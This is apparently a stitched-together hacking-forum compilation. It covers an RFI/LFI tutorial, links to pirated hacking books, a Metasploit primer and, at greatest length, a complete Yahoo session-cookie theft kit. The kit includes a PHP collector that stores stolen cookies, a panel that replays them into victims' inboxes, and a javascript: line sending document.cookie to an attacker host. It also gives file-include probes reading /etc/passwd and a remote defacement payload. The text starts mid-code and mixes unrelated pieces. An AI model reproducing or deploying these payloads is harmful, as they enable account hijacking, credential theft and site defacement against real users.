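        print("escaped :", elements_created(render_search_escaped(payload)))
        print("          ", render_search_escaped(payload))
```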
--------------------------------------------------------------------------------------------------------------------
RFI/LFI (Remote/Local File Include)
This vulnerability allows the user to include a remote or local file, and have it parsed and executed on the local server.
Example Vulnerable Code - index.php (PHP)
PHP Code:
<?php
$page = $_GET['p'];
if (isset($page)) {
    include($page);   // the request parameter is used as the include path unchecked
} else {
    include("home.php");
}
?>
Testing Inputs For Vulnerability
Try visiting "index.php?p=http://www.google.com/"; if you see Google, it is vulnerable to RFI and consequently LFI. If you don't it's not vulnerable to RFI, but still may be vulnerable to LFI. Assuming the server is running *nix, try viewing "index.php?p=/etc/passwd"; if you see the passwd file, it's vulnerable to LFI; else, it's not vulnerable to RFI or LFI.
Example Exploit
Let's say the target is vulnerable to RFI and we upload the following PHP code to our server:
PHP Code:
<?php
unlink("index.php");
system("echo Hacked > index.php");
?>

and then we view "index.php?p=http://our.site.com/malicious.php" then our malicious code will be run on their server, and by doing so, their site will simply say 'Hacked' now.
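The fix for index.php is to never let the request choose an arbitrary path. As an added example (mine, not the tutorial's), the Python functions below resolve the `p` parameter two ways: against an allowlist of page names, which is the recommended form, and, as a weaker fallback, by refusing URLs, absolute paths and NUL bytes and checking that the normalised path stays inside the pages directory. The three inputs from the tests above (a URL, `/etc/passwd`, a remote `malicious.php`) and a traversal string are all refused; the pages directory and allowlist are assumptions of the example.

```python
import posixpath
from urllib.parse import urlsplit

PAGES_DIR = "/var/www/app/pages"                 # assumed layout
ALLOWED_PAGES = frozenset({"home", "about", "contact"})


def resolve_page_allowlist(p):
    """Preferred fix: the parameter selects one of a fixed set of names and
    nothing else. Anything not in the set, including every URL or path, is
    refused (None), and a missing parameter falls back to home as index.php does."""
    name = p or "home"
    if name not in ALLOWED_PAGES:
        return None
    return f"{PAGES_DIR}/{name}.php"


def resolve_page_contained(p):
    """Weaker fallback when an allowlist is impractical. Rejects anything
    with a URL scheme (remote include), absolute paths, NUL bytes (which
    truncated include paths in PHP before 5.3.4), and any name whose
    normalised path escapes PAGES_DIR via '..' components."""
    name = p or "home"
    if "\x00" in name or urlsplit(name).scheme or name.startswith("/"):
        return None
    full = posixpath.normpath(posixpath.join(PAGES_DIR, name + ".php"))
    if not full.startswith(PAGES_DIR + "/"):
        return None
    return full


if __name__ == "__main__":
    # Constructed inputs: the tutorial's probes plus a traversal attempt.
    for p in (None, "about", "http://www.google.com/", "/etc/passwd",
              "http://our.site.com/malicious.php", "../../../../etc/passwd"):
        print(f"{p!r:40} allowlist={resolve_page_allowlist(p)!r:35} contained={resolve_page_contained(p)!r}")
```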
--------------------------------------------------------------------------------------------------------------------
Recommended for all beginners
For all beginners who don't have basic knowledge and want to learn: visit this site and check the lesson section:
Code:
http://www.hackerhighschool.org/
----------------------------------------------------------------------------------------------------------------
Those who want to move to advanced forms of hacking must download this book by VINAY bhai named "Access Denied". It's a wonderful book and requires programming skills:
Code:
http://cid-dca018b0abc58bcb.skydrive.live.com/self.aspx/.Public/Access%20Denied.rar?lc=16393
----------------------------------------------------------------------------------------------------------------
Other books recommended are:
shellcoder's handbook
gray hat hacking (please google them)
Writing security tools and exploits:
Code:
http://hack0wn.com/filedesc/pdf/Writing%20Security%20Tools%20and%20Exploits.pdf
-------------------------------------------------------------------------------------------------------------
LinuxCBT Security Edition (video tutorial, excellent) 4.7GB
1. Security Basics (fundamentals)
2. Proxy Security feat. Squid
3. Firewall Security feat. IPTables
4. SELinux Security - MAC-based Security Controls
5. Network Intrusion Detection System (NIDS) Security feat. Snort® NIDS
6. Packet | Capture | Analysis Security feat. Ethereal®|WireShark®
7. Pluggable Authentication Modules (PAM) Security
8. Open Secure Shell version 2 (OpenSSHv2) Security
9. OpenPGP with Gnu Privacy Guard (GPG) Security
10. Secure File Transfer Protocol (SFTP) Security
Code:
http://isohunt.com/torrent_details/118749757/linux+cbt+linuxcbt?tab=summary

-------------------------------------------------------------------------------------------------------------

Metasploit is an exploitation framework widely used by hackers, pen testers and security researchers. The Metasploit Framework is a tool for developing and executing exploit code against a remote target machine. The Metasploit Project is also well-known for anti-forensic and evasion tools, some of which are built into the Metasploit Framework.

Background: Metasploit was created in 2003 as a portable network game using the Perl scripting language. Later, the Metasploit Framework was then completely rewritten in the Ruby programming language. It is most notable for releasing some of the most technically sophisticated exploits to public security vulnerabilities. In addition, it is a powerful tool for third-party security researchers to investigate potential vulnerabilities. On October 21, 2009 the Metasploit Project announced that it had been acquired by Rapid7, a security company that provides unified vulnerability management solutions.
--------------------------------------------------------------------------------------------------------------------
In this tutorial, I will discuss using Metasploit, its commands and its advantages. Now we all know that it's a famous exploitation framework used widely. So let's start.

Installing on windows:- Download the installer from the site and install it

Installing on Linux:- Refer to Metasploit Linux support for installation on Linux:
http://www.metasploit.com/framework/support/

Let's get familiar with some common terms to be used:

Exploit: It is the way of getting into the system via a vulnerability or bad setup/configuration.


Payload: It is what we want the exploit to do; a kind of configuration for the attack.

Auxiliary: These are other applications which come with Metasploit, like the scanners, detectors and sniffers.

Encoders: With a lot of exploits, antiviruses pick them up when an attacker tries to execute them on the victim box. What the encoders do is jumble the code somewhat, so it makes it a lot harder for antiviruses to detect them. Very handy.

--------------------------------------------------------------------------------------------------------------------
Commands

Various commands are used in Metasploit for attacking and exploitation. I am describing some of them here:

search: search is very useful when you don't know the exploit name. For example, if I don't know about a particular exploit for the Apache server I can find it using search apache.

set and setg: set is what you would use when you're doing a single attack. setg means set global, so every exploit you test during that session will use the same LHOST and RHOST, for example:

setg LHOST 192.168.1.5
setg RHOST 192.168.1.150


show: if you type show it will display all the exploits, payloads and auxiliaries it has.

info: info lets you pull up the available information about an exploit. So if you type info exploit it will show you the information Metasploit has on it.

Hacking Email Yahoo by Stealing Cookies

FOR EDUCATIONAL PURPOSES ONLY!

Please delete if it is repost....thank you!

First of all, let's find out the basics of cookies.
What are session cookies or session IDs?
---> Whenever we sign into an account the site generates a unique string. One copy is saved on the server and the other in our browser as a cookie. The two are matched every time we do anything in our account. Session cookies enable the website you are visiting to keep track of your movement from page to page, so you don't get asked for the same information you've already given to the site. Cookies allow you to proceed through many pages of a site quickly and easily without having to authenticate or reprocess each new area you visit. This string, or login session, is destroyed when we click the 'Sign Out' option.

Now let's find out how it works:
Just visit yahoo.com, paste the code below into your browser's URL bar and press Enter (you will get a pop-up box showing the cookies).

Code:
javascript:alert(document.cookie);

Now let's go deeper:
Log in to your account and run the same code again; you will notice some more elements added to the cookies. These represent session IDs.

So sessions are stored in our browser in the form of cookies.

An attacker can steal that session by convincing the slave to run a piece of code in the browser. The attacker can then use the stolen session to log in to the slave's account without providing any username/password. This attack is very uncommon because when the slave clicks 'Sign out' the session gets destroyed and the attacker gets signed out too.

But in the case of Yahoo it's not the same. The attacker doesn't get signed out when the slave clicks 'Sign out'. The session does get destroyed automatically by Yahoo after 24 hrs, but when the user simply refreshes the window in the Yahoo account, he gets a session again for the next 24 hrs. This means that once the Yahoo account session is stolen, the attacker can access the account for a lifetime by refreshing the window every 24 hrs. I am not actually sure whether it's 24 or 48 hrs.

Here we go, this is what we need.
Steps for stealing session cookies:
1. Sign up for an account at any free web hosting site.
2. Now log in to your account and go to the file manager. Put these files in the www folder.
a. Name this code hacked.php
Code:
<?php
$pass = "scifix";

?>

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title id=xx>scifix</title>
<link rel="stylesheet" href="s.css" />
<script type="text/javascript" src="j.js"></script><style type="text/css">
<!--
body {
    background-color: white;
}
-->
</style>
<style type=text/css>
#xx{font-family:"Times New Roman" size:30px}
</style>

</head>
<body>
<!---

--->
<div id="header" class="header">

    <td align="left">
      <table cellpadding="0" cellspacing="0" border="0" width="100%" align="center">
        <tr align="left">
          <td width="50%">&nbsp;</td>
          <td width="50%"> <p align="right"><a href="?"><span class="links"> Refresh | </span></a><a href="?logout=1"><span class="links"> LogOut </span></a>
          </p></td>
        </tr>
      </table>
  </td>
</td>
</div>
<br />
<br />
<br />

<center>
  <font color="black" face="Terminal" size=9 >www.hackforums.net</font>
</center>
<center>
  <font color="blue" size="6" face="Terminal">SCIFIX AT YOUR SERVICE --sharing is learning--</font>
</center>

<br />
<br />
<br />



<div id="wrapper">

  <table cellpadding="0" cellspacing="0" border="0" class="sortable" id="sorter">
    <tr>
      <th width="162"><p><font color="red" >Hacked account (Click to access) </font></p></th>
      <th width="170"><p><font color="red" >Date</font></p></th>
     
      <th width="77"><p><font color="red" >Delete</font></p></th>
  </tr>
  <?php
   if($_GET['logout'] == 1) {
  echo "<script>document.cookie ='pass=; path=/'</script>";
  echo "<meta HTTP-EQUIV=\"REFRESH\" content=\"0; url=?\">";
   }

  if(isset($_POST["pass"])) {
echo "<script>document.cookie ='pass=".$_POST['pass']."; path=/'</script>";
echo "<meta HTTP-EQUIV=\"REFRESH\" content=\"0; url=\">";
                 }
if($_COOKIE['pass'] != $pass) {


        echo '</table></div><div align="center"><b>Enter the password (I hope javascript is on): </b><p><form method="post">' .
             '<input type="password" name="pass"> <input type="submit" name="check" value="Login">' .
             '</form> </div>';
          exit(0);
}



if($_GET['del']) {
        @unlink("./cookies/".$_GET['del']);
                    }

if ($handle = opendir('./cookies/')) {
    while ($file = readdir($handle)) {
        if ($file != "." && $file != ".." && $file != "index.html") {



$fcookie = "./cookies/".$file;
$fh = fopen($fcookie, 'r');
$cookie = fread($fh, filesize($fcookie));

    $T = explode("T=", $cookie); $T = $T[1];
    $T = explode(";", $T); $T = $T[0];

    $Y = explode("Y=", $cookie); $Y = $Y[1];
    $Y = explode(";", $Y); $Y = $Y[0];

    $yid = explode("l=", $Y); $yid = $yid[1];
    $yid = explode("/o", $yid); $yid = $yid[0];

    $str1 = "0123456789abcdefghijklmnopqrstuvwxyz-+._@";
    $str2 = "abcdefghijklmnopqrstuvwxyz0123456789-+._@";
    $id = ""; for($i = 0; $i < strlen($yid); $i++) $id .= $str2{strpos($str1, $yid{$i})};

    $p = substr($Y, strpos($Y, "p=") + 2, 7);
   
    $date = date ("M d Y H:i:s", filemtime("./cookies/".$file));

    $lang = explode("lg=", $Y); $lang = $lang[1];
    $lang = explode("&", $lang); $lang = $lang[0];


    $sr = array(array(";", "&", "="), array(null, "%26", "%3D"));
    $y = "Y%3D" . str_replace($sr[0], $sr[1], $Y);
    $t = "T%3D" . str_replace($sr[0], $sr[1], $T);

echo "<tr><td><a  href=\"http://msg.edit.yahoo.com/config/reset_cookies?.y=".$y."&.t=".$t."&.done=http%3A//us.mg1.mail.yahoo.com/ym/login%3Fymv%3D0\" target=\"_blank\"><b><font color=white size= 5px> ".$id."</font></b></a></td><td>";
echo $date."</td><td>";

echo "<a href=\"?del=".$file."\">Delete it</a></td></tr>";

}
}
    closedir($handle);
}


?>

        </tr>

    </table>
</div>
<script type="text/javascript">
var sorter=new table.sorter("sorter");
sorter.init("sorter",1);
</script>

</body>
</html>

b. Name this code j.js

 
Code:
var table=function(){
    function sorter(n){
        this.n=n; this.t; this.b; this.r; this.d; this.p; this.w; this.a=[]; this.l=0
    }
    sorter.prototype.init=function(t,f){
        this.t=document.getElementById(t);
        this.b=this.t.getElementsByTagName('tbody')[0];
        this.r=this.b.rows; var l=this.r.length;
        for(var i=0;i<l;i++){
            if(i==0){
                var c=this.r[i].cells; this.w=c.length;
                for(var x=0;x<this.w;x++){
                    if(c[x].className!='nosort'){
                        c[x].className='head';
                        c[x].onclick=new Function(this.n+'.work(this.cellIndex)')
                    }
                }
            }else{
                this.a[i-1]={}; this.l++;
            }
        }
        if(f!=null){
            var a=new Function(this.n+'.work('+f+')'); a()
        }
    }
    sorter.prototype.work=function(y){
        this.b=this.t.getElementsByTagName('tbody')[0]; this.r=this.b.rows;
        var x=this.r[0].cells[y],i;
        for(i=0;i<this.l;i++){
            this.a[i].o=i+1; var v=this.r[i+1].cells[y].firstChild;
            this.a[i].value=(v!=null)?v.nodeValue:''
        }
        for(i=0;i<this.w;i++){
            var c=this.r[0].cells[i];
            if(c.className!='nosort'){c.className='head'}
        }
        if(this.p==y){
            this.a.reverse(); x.className=(this.d)?'asc':'desc';
            this.d=(this.d)?false:true
        }else{
            this.p=y; this.a.sort(compare); x.className='asc'; this.d=false
        }
        var n=document.createElement('tbody');
        n.appendChild(this.r[0]);
        for(i=0;i<this.l;i++){
            var r=this.r[this.a[i].o-1].cloneNode(true);
            n.appendChild(r); r.className=(i%2==0)?'even':'odd'
        }
        this.t.replaceChild(n,this.b)
    }
    function compare(f,c){
        f=f.value,c=c.value;
        var i=parseFloat(f.replace(/(\$|\,)/g,'')),n=parseFloat(c.replace(/(\$|\,)/g,''));
        if(!isNaN(i)&&!isNaN(n)){f=i,c=n}
        return (f>c?1:(f<c?-1:0))
    }
    return{sorter:sorter}
}();

c. Name this code c.css

 
Code:
* {margin:0; padding:0}
body {font:10px Verdana,Arial}
#wrapper {width:825px; margin:30px auto}
#header    {width:100%; height:18px; background: repeat-x; text-align:left;}
.sortable {width:823px; border:1px solid white; border-bottom:none}
.sortable th {padding:4px 6px 6px; background:white; color:#fff; text-align:left; color:#ccc}
.sortable td {padding:2px 4px 4px; background:white; border-bottom:1px solid #ccc}

.sortable .head:hover, .sortable .desc:hover, .sortable .asc:hover {color:#fff}
.sortable .even td {background:green}
.sortable .odd td {background:#fff}

.links {
    color: white;
    text-decoration: none;
    text-align: right;
}

a {
    text-decoration: none;
    color: black;
        face: terminal;
}

d. Name this code yahoo.php

 
Code:
<?php
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////


$redirect_to = 'http://yahoo.com';
////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////

if(!isset($_GET["ex"]) || empty($_GET["ex"]))  {
echo "<meta HTTP-EQUIV=\"REFRESH\" content=\"0; url=".$X44."\">";

} else {

$cookie = $_GET['ex'];
echo "<meta HTTP-EQUIV=\"REFRESH\" content=\"0; url=".$redirect_to."\">";
$Y = explode("Y=", $cookie); $Y = $Y[1];
$Y = explode(";", $Y); $Y = $Y[0];
$yid = explode("l=", $Y); $yid = $yid[1];
$yid = explode("/o", $yid); $yid = $yid[0];
$str1 = "0123456789abcdefghijklmnopqrstuvwxyz-+._@";
$str2 = "abcdefghijklmnopqrstuvwxyz0123456789-+._@";
$id = "";
for($i = 0; $i < strlen($yid); $i++) $id .= $str2{strpos($str1, $yid{$i})};
if ($id != '') {
$rand = rand(0, 1000000);
$fcookie = "./cookies/".$id."_".$rand;
$fh = fopen($fcookie, 'w') or die("chmod???");
fwrite($fh, $cookie);
fclose($fh);
}
}
?>
e. Last, create a folder named cookies (leave it empty; this is where the stolen cookies are stored).

3. Now give this code to the slave to run in his browser while he is logged in to his/her Yahoo account.

Code:
javascript:document.location='http://yourdomain.com/yahoo.php?ex='.concat(escape(document.cookie));

Note: yahoo.php is basically the cookie-stealing script and hacked.php loads the stolen cookies in the browser.
Stolen cookies are stored in the folder named 'cookies'. And remember to change the domain in the code above (http://yourdomain.com) to the domain you got when you signed up for free web hosting.

When the slave runs the code in his browser, he is redirected back to his Yahoo account.

5. Now open hacked.php.
The URL would be: http://yourdomain.com/hacked.php

And enter the password (the default password is scifix).

Now you should have the username of the slave's account. Simply click on it and it will take you to the inbox of the slave's Yahoo account without asking for any password.
Now it doesn't matter if the slave signs out of his account; you remain logged in.

Note: You can try this attack using two browsers. Sign in to the Yahoo account in one browser and run the code, then sign in through the other browser using the stolen session.

Good luck guys! Anyway, use an English to Indonesian translator to make it easier to understand.

Disclaimer: I will not be liable for any loss, any physical injury or any lawsuit upon using this tutorial; use at your own risk ^_^